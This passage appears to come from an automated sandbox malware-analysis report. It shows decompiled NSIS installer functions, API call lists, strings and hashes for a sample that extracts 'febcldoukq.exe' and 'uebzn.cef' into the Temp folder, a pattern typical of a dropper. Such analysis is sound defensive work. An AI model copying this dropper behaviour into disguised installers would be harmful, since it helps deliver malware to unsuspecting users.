                                              0x00402d90
                                              0x00402d99
                                              0x00402d9f
                                              0x00402da4
                                              0x00402daa
                                              0x00000000
                                              0x00000000
                                              0x00402db4
                                              0x00402dbc
                                              0x00402dbf
                                              0x00402dc4
                                              0x00402dc6
                                              0x00402dc6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402db4
                                              0x00402dd7
                                              0x00402ddd
                                              0x00402ded
                                              0x00402ded
                                              0x00402df0
                                              0x00402df6
                                              0x00402df8
                                              0x00000000
                                              0x00402d16

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402C9C
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\qHpeBvr9cR.exe,00000400), ref: 00402CB8
                                                • Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\qHpeBvr9cR.exe,80000000,00000003), ref: 004059D6
                                                • Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\qHpeBvr9cR.exe,C:\Users\user\Desktop\qHpeBvr9cR.exe,80000000,00000003), ref: 00402D01
                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48
                                              Strings
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
                                              • soft, xrefs: 00402D78
                                              • Null, xrefs: 00402D81
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
                                              • C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
                                              • C:\Users\user\Desktop\qHpeBvr9cR.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
                                              • Error launching installer, xrefs: 00402CD8
                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
                                              • "C:\Users\user\Desktop\qHpeBvr9cR.exe", xrefs: 00402C88
                                              • Inst, xrefs: 00402D6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\qHpeBvr9cR.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\qHpeBvr9cR.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                              • API String ID: 2803837635-1348030957
                                              • Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                              • Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
                                              • Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                              • Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 75%
                                              			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040585B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c50);
					E00405CFB();
				}
				E00405F5D(0x409c50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FF6(0x409c50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059B3(0x409c50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x424008;
						goto L32;
					} else {
						E00405CFB(0x40a450, 0x425000);
						E00405CFB(0x425000, 0x409c50);
						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
						E00405CFB(0x425000, 0x40a450);
						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x424008 =  &( *0x424008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c50);
								_push(0xfffffffa);
								E00404FE7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FE7(0xffffffea,  *(_t85 - 0xc));
				 *0x424034 =  *0x424034 + 1;
				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x424034 =  *0x424034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
					} else {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
						lstrcatA(0x409c50,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c50);
					E004055BC();
					goto L29;
				}
				goto L33;
			}
















                                              0x00401734
                                              0x0040173b
                                              0x00401744
                                              0x00401747
                                              0x0040174a
                                              0x0040174f
                                              0x00401757
                                              0x00401773
                                              0x00401759
                                              0x00401759
                                              0x0040175a
                                              0x0040175a
                                              0x00401779
                                              0x00401783
                                              0x00401783
                                              0x00401787
                                              0x0040178a
                                              0x0040178f
                                              0x00401791
                                              0x00401793
                                              0x00401798
                                              0x00401798
                                              0x004017a3
                                              0x004017a3
                                              0x004017b4
                                              0x004017b6
                                              0x004017b6
                                              0x004017b7
                                              0x004017b7
                                              0x004017ba
                                              0x004017bd
                                              0x004017c0
                                              0x004017c0
                                              0x004017c7
                                              0x004017d6
                                              0x004017db
                                              0x004017de
                                              0x004017e1
                                              0x00000000
                                              0x00000000
                                              0x004017e3
                                              0x004017e6
                                              0x00401840
                                              0x00401845
                                              0x004015a8
                                              0x00402672
                                              0x00402672
                                              0x004028a1
                                              0x004028a4
                                              0x004028a4
                                              0x00000000
                                              0x004017e8
                                              0x004017ee
                                              0x004017f9
                                              0x00401806
                                              0x00401811
                                              0x00401827
                                              0x00401827
                                              0x0040182a
                                              0x00000000
                                              0x00401830
                                              0x00401830
                                              0x00401831
                                              0x0040184e
                                              0x004028aa
                                              0x004028aa
                                              0x004028aa
                                              0x00401833
                                              0x00401833
                                              0x00401834
                                              0x00401492
                                              0x00402224
                                              0x00402224
                                              0x00402224
                                              0x00401831
                                              0x0040182a
                                              0x004028ac
                                              0x004028b0
                                              0x004028b0
                                              0x0040185e
                                              0x00401863
                                              0x00401871
                                              0x00401876
                                              0x0040187c
                                              0x00401880
                                              0x00401882
                                              0x0040188a
                                              0x00401896
                                              0x00401884
                                              0x00401884
                                              0x00401888
                                              0x00000000
                                              0x00000000
                                              0x00401888
                                              0x0040189f
                                              0x004018a5
                                              0x004018a7
                                              0x00000000
                                              0x004018ad
                                              0x004018ad
                                              0x004018b0
                                              0x004018c8
                                              0x004018b2
                                              0x004018b5
                                              0x004018be
                                              0x004018be
                                              0x004018cd
                                              0x004018d2
                                              0x0040221f
                                              0x00000000
                                              0x0040221f
                                              0x00000000

                                              APIs
                                              • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef,"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef,00000000,00000000,"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef$C:\Users\user\AppData\Local\Temp
                                              • API String ID: 1941528284-4149166923
                                              • Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                              • Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
                                              • Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                                              • Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 415 402f2e-402f3d 416 402f5b-402f66 call 403059 415->416 417 402f3f-402f55 SetFilePointer 415->417 420 403052-403056 416->420 421 402f6c-402f86 ReadFile 416->421 417->416 422 402f8c-402f8f 421->422 423 40304f 421->423 422->423 424 402f95-402fa8 call 403059 422->424 425 403051 423->425 424->420 428 402fae-402fb1 424->428 425->420 429 402fb3-402fb6 428->429 430 40301e-403024 428->430 433 40304a-40304d 429->433 434 402fbc 429->434 431 403026 430->431 432 403029-40303c ReadFile 430->432 431->432 432->423 435 40303e-403047 432->435 433->420 436 402fc1-402fc9 434->436 435->433 437 402fcb 436->437 438 402fce-402fe0 ReadFile 436->438 437->438 438->423 439 402fe2-402fe5 438->439 439->423 440 402fe7-402ffc WriteFile 439->440 441 40301a-40301c 440->441 442 402ffe-403001 440->442 441->425 442->441 443 403003-403016 442->443 443->436 444 403018 443->444 444->433
                                              C-Code - Quality: 93%
                                              			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423fd8;
					 *0x417124 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403059(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417124 =  *0x417124 + _t57;
						_t32 = E00403059(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417124 =  *0x417124 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417124 =  *0x417124 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                              0x00402f33
                                              0x00402f3d
                                              0x00402f46
                                              0x00402f4a
                                              0x00402f55
                                              0x00402f55
                                              0x00402f5d
                                              0x00402f5f
                                              0x00402f66
                                              0x00402f82
                                              0x00402f86
                                              0x0040304f
                                              0x0040304f
                                              0x00000000
                                              0x00402f95
                                              0x00402f98
                                              0x00402f9e
                                              0x00402fa5
                                              0x00402fa8
                                              0x00402fb1
                                              0x0040301e
                                              0x00403024
                                              0x00403026
                                              0x00403026
                                              0x00403038
                                              0x0040303c
                                              0x00000000
                                              0x0040303e
                                              0x0040303e
                                              0x00403041
                                              0x00403047
                                              0x00000000
                                              0x00403047
                                              0x00402fb3
                                              0x00402fb6
                                              0x0040304a
                                              0x0040304a
                                              0x00402fbc
                                              0x00402fc1
                                              0x00402fc1
                                              0x00402fc9
                                              0x00402fcb
                                              0x00402fcb
                                              0x00402fdc
                                              0x00402fe0
                                              0x00000000
                                              0x00000000
                                              0x00402ff4
                                              0x00402ffc
                                              0x0040301a
                                              0x00403051
                                              0x00403051
                                              0x00403003
                                              0x00403003
                                              0x00403006
                                              0x00403009
                                              0x0040300c
                                              0x00403016
                                              0x00000000
                                              0x00403018
                                              0x00000000
                                              0x00403018
                                              0x00403016
                                              0x00000000
                                              0x00402ffc
                                              0x00000000
                                              0x00402fc1
                                              0x00402fb6
                                              0x00402fb1
                                              0x00402fa8
                                              0x00402f86
                                              0x00403052
                                              0x00403056

                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
                                              • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
                                              • ReadFile.KERNELBASE(00413120,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
                                              • WriteFile.KERNELBASE(00000000,00413120,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: File$Read$PointerWrite
                                              • String ID: 1A
                                              • API String ID: 2113905535-9103686
                                              • Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                              • Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
                                              • Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                              • Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00403059 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 445 403059-403082 GetTickCount 446 4031c3-4031cb call 402be9 445->446 447 403088-4030b3 call 403207 SetFilePointer 445->447 452 4031cd-4031d2 446->452 453 4030b8-4030ca 447->453 454 4030cc 453->454 455 4030ce-4030dc call 4031d5 453->455 454->455 458 4030e2-4030ee 455->458 459 4031b5-4031b8 455->459 460 4030f4-4030fa 458->460 459->452 461 403125-403141 call 406184 460->461 462 4030fc-403102 460->462 468 403143-40314b 461->468 469 4031be 461->469 462->461 463 403104-403124 call 402be9 462->463 463->461 471 40314d-403163 WriteFile 468->471 472 40317f-403185 468->472 470 4031c0-4031c1 469->470 470->452 473 403165-403169 471->473 474 4031ba-4031bc 471->474 472->469 475 403187-403189 472->475 473->474 476 40316b-403177 473->476 474->470 475->469 477 40318b-40319e 475->477 476->460 478 40317d 476->478 477->453 479 4031a4-4031b3 SetFilePointer 477->479 478->477 479->446
                                              C-Code - Quality: 94%
                                              			E00403059(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417124; // 0x54f53
				_t37 = _t35 -  *0x40b090 + _a4;
				 *0x423f8c = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BE9(1);
					return 0;
				}
				E00403207( *0x41f134);
				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
				 *0x41f130 = _t37;
				 *0x417120 = 0;
				while(1) {
					_t12 =  *0x417128; // 0x45a8d
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f134;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031D5(0x413120, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f134 =  *0x41f134 + _t34;
					 *0x40b0b0 = 0x413120;
					 *0x40b0b4 = _t34;
					L6:
					L6:
					if( *0x423f90 != 0 &&  *0x424020 == 0) {
						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
						E00402BE9(0);
					}
					 *0x40b0b8 = 0x40b120;
					 *0x40b0bc = 0x8000; // executed
					_t16 = E00406184(0x40b098); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40b0b8; // 0x40e6f7
					_t40 = _t39 - 0x40b120;
					if(_t40 == 0) {
						__eflags =  *0x40b0b4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417124; // 0x54f53
						if(_t18 -  *0x40b090 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40b090 =  *0x40b090 + _t40;
						_t53 =  *0x40b0b4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                              0x0040305d
                                              0x0040306a
                                              0x0040307d
                                              0x00403082
                                              0x004031c3
                                              0x004031c5
                                              0x00000000
                                              0x004031cb
                                              0x0040308e
                                              0x004030a1
                                              0x004030a7
                                              0x004030ad
                                              0x004030b8
                                              0x004030b8
                                              0x004030bd
                                              0x004030c2
                                              0x004030ca
                                              0x004030cc
                                              0x004030cc
                                              0x004030d5
                                              0x004030dc
                                              0x00000000
                                              0x00000000
                                              0x004030e2
                                              0x004030e8
                                              0x004030ee
                                              0x00000000
                                              0x004030f4
                                              0x004030fa
                                              0x0040311a
                                              0x0040311f
                                              0x00403124
                                              0x0040312a
                                              0x00403130
                                              0x0040313a
                                              0x00403141
                                              0x00000000
                                              0x00000000
                                              0x00403143
                                              0x00403149
                                              0x0040314b
                                              0x0040317f
                                              0x00403185
                                              0x00000000
                                              0x00000000
                                              0x00403187
                                              0x00403189
                                              0x00000000
                                              0x00000000
                                              0x0040318b
                                              0x0040318b
                                              0x0040319e
                                              0x00000000
                                              0x00000000
                                              0x004031ad
                                              0x00000000
                                              0x004031ad
                                              0x0040315b
                                              0x00403163
                                              0x004031ba
                                              0x004031c0
                                              0x004031c0
                                              0x00000000
                                              0x0040316b
                                              0x0040316b
                                              0x00403171
                                              0x00403177
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040317d
                                              0x004031be
                                              0x004031be
                                              0x00000000
                                              0x004031be
                                              0x00000000

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040306E
                                                • Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
                                              • WriteFile.KERNELBASE(0040B120,0040E6F7,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
                                              • SetFilePointer.KERNELBASE(00054F53,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: File$Pointer$CountTickWrite
                                              • String ID: 1A
                                              • API String ID: 2146148272-9103686
                                              • Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                              • Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
                                              • Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                              • Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 480 4015b3-4015c6 call 402a0c call 405882 485 4015c8-4015e3 call 405819 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40217f call 401423 486->488 489 40160f-401628 call 401423 call 405cfb SetCurrentDirectoryA 486->489 501 4028a1-4028b0 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                                              C-Code - Quality: 85%
                                              			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A0C(0xfffffff0);
				_t10 = E00405882(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405819(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
